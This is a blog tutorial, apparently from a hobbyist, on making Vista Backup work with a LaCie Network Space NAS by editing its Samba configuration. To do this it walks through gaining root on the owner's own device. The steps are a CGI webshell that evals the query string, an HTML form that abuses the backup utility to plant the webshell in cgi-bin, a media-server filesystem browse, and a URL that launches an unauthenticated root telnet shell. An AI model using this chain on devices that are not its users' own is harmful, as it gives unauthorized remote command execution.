SOLVED: Vista backup with Lacie Network Space


 

Applies to:

  • Cannot create a file when that file already exists. (0x800700B7)
  • Vista Backup and Restore Center
  • NAS devices running Samba (in this case, Lacie)
  • Gaining full control over your Lacie Network Space using telnet (Hack)

 

Introduction

So I bought this cheap Lacie NAS device without doing the research and found out I wasn’t able to backup my home computers to it with the native Vista backup client. Loads of threads about the 0x80070534 error but most of the time the solution is to contact your vendor for a firmware update, that does not exist…

So I decided to share how I resolved the issue maybe saving you time, but remember: proceed at your own risk!

 

Problem background

The 0x80070534 error is caused by Samba , basically a SMB daemon that allows Unix/Linux and windows network integration. Samba allows you to create winsows shares and print servers on non-windows machines.

For Backup and Restore Center to work, Samba should be

  • At least version 3.0.25 (if it’s not, your vendor really should provide a firmware update. You could update it yourself getting started with gaining control over your device below)
  • Be configured with the following parameters:
    •     profile acls = yes
    •     nt acl support = no

So the question is: how do you change your samba config to make this happen (and without opening the box and losing your warranty)

Step 1: Gaining full control over your Lacie Network Space

Your Lacie device has backup tool and a mediaserver deamon (which is great btw) which combined allow you to hack the box.

Create a simple shell script

    The simple script below will allow you to pass commands to your box through the address bar of your browser. Create and save it as webshell to the ‘openshare’ of your nas.
    Warning: the file should have no extension, and be saved in Unix-format. You can’t do this with Notepad. Use an editor like notepad + + and make sure you save in Unix format.

#!/bin/sh
echo “Content-type: text/plain”
echo “”
echo $QUERY_STRING
eval $QUERY_STRING

    Create a web page to upload the shell access script.

    Create and save the html page below and save it to the ‘openshare’ on your nas (as an .htm file)

<html>
<head>
<title>Upload Webshell Script</title>
<script language=’Javascript’>   function submitForm()   {      document.edit_form.action = ‘http://&#8217; + document.getElementById(‘ipnas’).value + ‘/cgi-bin/admin/backup’;      document.edit_form.submit();   }   </script>
</head>
<body>

<form name=’edit_form’ method=’post’ >

Your Nas Ip adress or HostName</br>
<input tyte=’text’ name=’ipnas’ id=’ipnas’ value=’NetworkSpace’ size=’60’></br>

Script file Source (Path to folder, without filename on usbkey or share)(No / at the end!)</br>
<input tyte=’text’  name=’select2′ id=’select2′  value=’/home/openshare’ size=’60’></br>
Destination (Normally, don’t modify)(No / at the end)</br>
<input tyte=’text’ name=’select1′ id=’select1′ value=’/www/cgi-bin/admin’ size=’60’></br>
<input type=’hidden’ id=’update’ name=’update’ value=’true’></br>
<a href=’javascript:submitForm();’>Copy</a>
</form>

</body></html>

    Upload the webshell script

    Double-click the htm-file you just created. Ennter the ip-address or hostname of your nas and click copy. The Lacie backup tool will copy the script to the nas.

    

  • You might get a login screen to access the Lacie backup utility if you haven’t logged on yet
  • You might see an error, ignore it

 

Find out where the script has landed.

    The Lacie backup utility (which just sucks btw) we just (ab-)used created a time-stamp based folder to put the file in. Now we need to find out the location of our webshell script.

  • Navigate to your-nas-ip-or hostname:9000/rpc/set_option?contentbase=/
  • Go to you’re the configuration pages of your twonky media server at your-nas-ip-or-hostname:9000/config

    You can browse the file system using one of the Browse buttons. Note the folder name in which the webshell file is, it should be something like
    /www/cgi-bin/admin/Webshell-2009093014091254314896

    Make sure you don’t save changes to your mediaserver settings!

Note: you might find yourself unable to see the Twonky pages. This is because the server is set to allow local connections only. There is an easy way to fool the server thinking you’re making al local connection: make sure your dektop and nas up’s are set up as follows:

    Your ip: 192.168.1.5    Your nas ip: 192.168.1.51
    Your ip: 192.168.1.12    Your nas ip: 192.168.1.121
    

    Once you’re in, set the server to allow remote connections.

 

You have now created a backdoor on your nas allowing you to send commands from your browser address bar: http://your-nas-ip/cgi-bin/admin/Webshell-your-folder-name/webshell?somecommand
So what command are we looking for ? Telnet, of course!

 

Step2: Installing Telnet on your NAS

 

    Download

First you need a compiled telnet deamon somewhere on your nas. Download it from here (right-click, save target as) and save it to the openshare on your nas. Windows might save this as a text file.Make sure it has no extension!

    Set up a root password for Telnet

    Start telnet with alternative login by going to this url (replace your ip and foldername:

http://your-nas-ip-or-hostname/cgi-bin/admin/yourfoldername/webshell?/home/openshare/utelnetd -l /bin/sh

    The webpage won’t show you anyting but now you can telnet your nas:

    telnet your-nas-ip

Change the root password using the PASSWD command (change it to sth secure and make sure you remember it). Now restart the nas using the switch or the admin pages (which oesn’t always work for me)

When the nas is back online, you can start the telnet daemon in ‘normal’ mode:
    http://your-nas-ip-or-hostname/cgi-bin/admin/yourfoldername/webshell?/home/openshare/utelnetd -l /bin/sh. Login using your telnet client user root with the password you just chose.

 

Step3: Updating your Samba Configuration

Now that we have root access to our nas, we can do anything. But we were trying to make our backup work, remember?
Connect to your nas using your telnet client.

If you’re not familiar with linux, this will help with directory navigation and file operations.

    Check your Samba version

 smbd –V

    Your version should be above 3.0.25

    Find the Samba configuration file

 find / -name smb.conf- print
This will show you where to find the samba configuration file.

 

Backup and update the configuration file

 

 Copy your smb.conf file to a backup, eg smb-mybackup.conf using the cp command

 

  • Copy your smb.conf file to your openshare using the cp command
  • Edit the smb.conf file in your openshare. Don’t us Notepad, use Notepad++ ! For each share (there should be myshare and openshare), make sure the following entries exist:
    • profile acls = yes
    • nt acl support = no
  • Copy the file back to its original location using the cp command. This will overwrite the original configuration.
  • Restart the nas, preferably using the switch.

     

NO MORE 0x800700B7 ! You can now backup to your nas using Vista Backup and Restore Center.

 

Cleanup is always recommended

I strongly recommend you set up the telnet deamon to start automatically and remove the backdoor.

In my examples , I always write to the openshare folder. Better practice would be to write to a custom folder under openshare or myshare.

References:

http://ggts.net/2009/02/15/vista-backup-to-samba-share/

http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers

http://lacie.nas-central.org/wiki/Category:Network_Space

http://forum.nas-central.org/viewtopic.php?f=221&t=1181&sid=fb2b586582f1ea27b7e571e31852335e

http://www.psykocybernetik.com/blog/?q=content/add-ssh-lacie-edmini-v2

http://lacie.nas-central.org/index.php/SuccessStories

Advertisements

6 comments so far

  1. shortfriction on

    You are a legend. I read so many posts on this problem and yours was the only one I found that clued me in to the two acl samba parameters. Huge thanks from here!

  2. nick on

    Great article!
    It helped me very much.
    Thanks very much!

  3. gavin on

    Thank you so, so, so much for publishing this information. It helped me to fix my backup problem.

  4. discount party supplies on

    Excellent website. Lots of useful information here. I?m sending it to some pals ans additionally sharing in delicious. And naturally, thank you to your sweat!

  5. dc brand on

    Have you ever thought about including a little bit more than just your articles?
    I mean, what you say is fundamental and everything.
    But think of if you added some great graphics or videos to give your posts
    more, “pop”! Your content is excellent but with pics and video clips, this
    website could undeniably be one of the very best in its niche.
    Amazing blog!

  6. franciscofilipe on

    HI, i’m having some trouble on this step: ” Upload the webshell script
    “. i put the nas ip and webshell directory but when i click “copy ” nothing happens, and i can’t proceed. Thanks.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: